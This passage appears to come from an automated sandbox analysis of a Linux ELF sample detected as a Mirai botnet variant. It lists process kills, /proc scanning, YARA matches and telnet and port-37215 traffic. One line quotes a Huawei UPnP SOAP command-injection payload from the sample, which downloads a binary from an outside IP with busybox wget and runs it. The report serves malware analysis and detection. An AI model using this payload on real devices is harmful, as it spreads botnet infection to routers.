              Source: /tmp/if33NMq1O2.elf (PID: 6221)SIGKILL sent: pid: 2077, result: successfulJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)SIGKILL sent: pid: 2078, result: successfulJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)SIGKILL sent: pid: 2079, result: successfulJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)SIGKILL sent: pid: 2080, result: successfulJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)SIGKILL sent: pid: 2083, result: successfulJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)SIGKILL sent: pid: 2084, result: successfulJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)SIGKILL sent: pid: 2156, result: successfulJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)SIGKILL sent: pid: 6224, result: successfulJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)SIGKILL sent: pid: 6225, result: successfulJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)SIGKILL sent: pid: 6226, result: successfulJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)SIGKILL sent: pid: 6227, result: successfulJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)SIGKILL sent: pid: 6228, result: successfulJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)SIGKILL sent: pid: 6229, result: successfulJump to behavior
              Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: ELF static info symbol of initial sample.symtab present: no
              Source: /tmp/if33NMq1O2.elf (PID: 6221)SIGKILL sent: pid: 2018, result: successfulJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)SIGKILL sent: pid: 2077, result: successfulJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)SIGKILL sent: pid: 2078, result: successfulJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)SIGKILL sent: pid: 2079, result: successfulJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)SIGKILL sent: pid: 2080, result: successfulJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)SIGKILL sent: pid: 2083, result: successfulJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)SIGKILL sent: pid: 2084, result: successfulJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)SIGKILL sent: pid: 2156, result: successfulJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)SIGKILL sent: pid: 6224, result: successfulJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)SIGKILL sent: pid: 6225, result: successfulJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)SIGKILL sent: pid: 6226, result: successfulJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)SIGKILL sent: pid: 6227, result: successfulJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)SIGKILL sent: pid: 6228, result: successfulJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)SIGKILL sent: pid: 6229, result: successfulJump to behavior
              Source: if33NMq1O2.elf, type: SAMPLEMatched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
              Source: if33NMq1O2.elf, type: SAMPLEMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
              Source: 6213.1.00007fd3b0011000.00007fd3b0023000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
              Source: 6213.1.00007fd3b0011000.00007fd3b0023000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
              Source: 6209.1.00007fd3b0011000.00007fd3b0023000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
              Source: 6209.1.00007fd3b0011000.00007fd3b0023000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
              Source: 6258.1.00007fd3b0011000.00007fd3b0023000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
              Source: 6258.1.00007fd3b0011000.00007fd3b0023000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
              Source: classification engineClassification label: mal100.spre.troj.linELF@0/0@2/0
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/1582/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/2033/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/2275/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/3088/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/1612/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/1579/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/1699/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/1335/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/1698/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/2028/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/1334/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/1576/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/2302/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/3236/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/2025/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/2146/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/910/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/4444/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/6227/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/4445/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/6226/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/912/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/4446/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/6229/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/517/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/759/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/6228/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/2307/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/918/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/1594/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/2285/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/2281/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/1349/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/1623/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/761/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/1622/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/884/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/1983/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/2038/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/1344/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/1465/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/1586/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/1860/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/1463/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/2156/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/800/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/801/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/1629/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/1627/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/1900/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/4473/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/3021/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/491/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/2294/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/2050/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/1877/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/772/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/1633/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/1599/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/1632/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/774/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/1477/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/654/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/896/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/1476/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/1872/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/2048/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/655/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/1475/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/2289/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/656/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/777/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/657/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/658/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/4467/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/4500/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/419/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/936/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/1639/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/1638/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/2208/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/2180/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/4481/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/1809/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/6147/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/1494/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/1890/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/2063/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/2062/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/1888/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/1886/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/420/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/1489/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/785/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/1642/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/788/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/667/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/789/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/4479/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/1648/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/2078/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/2077/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/2074/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/2195/cmdlineJump to behavior
              Source: /tmp/if33NMq1O2.elf (PID: 6221)File opened: /proc/670/cmdlineJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: unknownNetwork traffic detected: HTTP traffic on port 34064 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34064 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48512 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51712 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34064 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48512 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51712 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 51912
              Source: unknownNetwork traffic detected: HTTP traffic on port 34064 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 51964
              Source: unknownNetwork traffic detected: HTTP traffic on port 51712 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48512 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 51986
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52002
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52014
              Source: unknownNetwork traffic detected: HTTP traffic on port 37532 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40630 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34064 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48512 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51712 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40630 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40630 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52046
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52178
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52218
              Source: unknownNetwork traffic detected: HTTP traffic on port 40630 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37532 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52242
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52260
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52316
              Source: unknownNetwork traffic detected: HTTP traffic on port 38108 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52342
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52370
              Source: unknownNetwork traffic detected: HTTP traffic on port 51712 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48512 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40630 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52412
              Source: unknownNetwork traffic detected: HTTP traffic on port 34064 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52452
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52468
              Source: unknownNetwork traffic detected: HTTP traffic on port 41028 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 58998 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37532 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38108 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52526
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52542
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52554
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52574
              Source: unknownNetwork traffic detected: HTTP traffic on port 51010 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52640
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52656
              Source: unknownNetwork traffic detected: HTTP traffic on port 51010 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52672
              Source: unknownNetwork traffic detected: HTTP traffic on port 40630 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52702
              Source: unknownNetwork traffic detected: HTTP traffic on port 38108 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51010 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52708
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52714
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52768
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52786
              Source: unknownNetwork traffic detected: HTTP traffic on port 39512 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52816
              Source: unknownNetwork traffic detected: HTTP traffic on port 48376 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51010 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52830
              Source: unknownNetwork traffic detected: HTTP traffic on port 48376 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37532 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48512 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51712 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48376 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39512 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34064 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48376 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51010 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38108 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39512 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38508 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40630 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38508 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48376 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38508 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38508 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53884 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39512 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53884 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51010 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38508 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37532 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48376 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53884 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56258 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56258 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56258 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38108 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51712 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48512 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56258 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34064 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39044
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39068
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39082
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39096
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39130
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39140
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39148
              Source: unknownNetwork traffic detected: HTTP traffic on port 38508 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53884 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39154
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39158
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39162
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39172
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39184
              Source: unknownNetwork traffic detected: HTTP traffic on port 37722 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39204
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39240
              Source: unknownNetwork traffic detected: HTTP traffic on port 56258 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39254
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39260
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39272
              Source: unknownNetwork traffic detected: HTTP traffic on port 37722 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39278
              Source: unknownNetwork traffic detected: HTTP traffic on port 40630 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39314
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39342
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39350
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39358
              Source: unknownNetwork traffic detected: HTTP traffic on port 37722 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39388
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39398
              Source: unknownNetwork traffic detected: HTTP traffic on port 39512 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39412
              Source: unknownNetwork traffic detected: HTTP traffic on port 59154 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56952 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49608 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53148 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48078 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39418
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39444
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39458
              Source: unknownNetwork traffic detected: HTTP traffic on port 49608 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53148 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48078 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39484
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39498
              Source: unknownNetwork traffic detected: HTTP traffic on port 56952 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59154 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48078 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53148 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49608 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37722 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56952 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59154 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49608 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53148 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48078 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37352 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51010 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37352 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59154 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56952 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53148 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48078 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49608 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37352 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37722 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48376 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56258 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37352 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59154 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56952 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49608 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53148 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48078 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53884 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37352 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37722 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38508 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54612 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37532 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59154 -> 37215
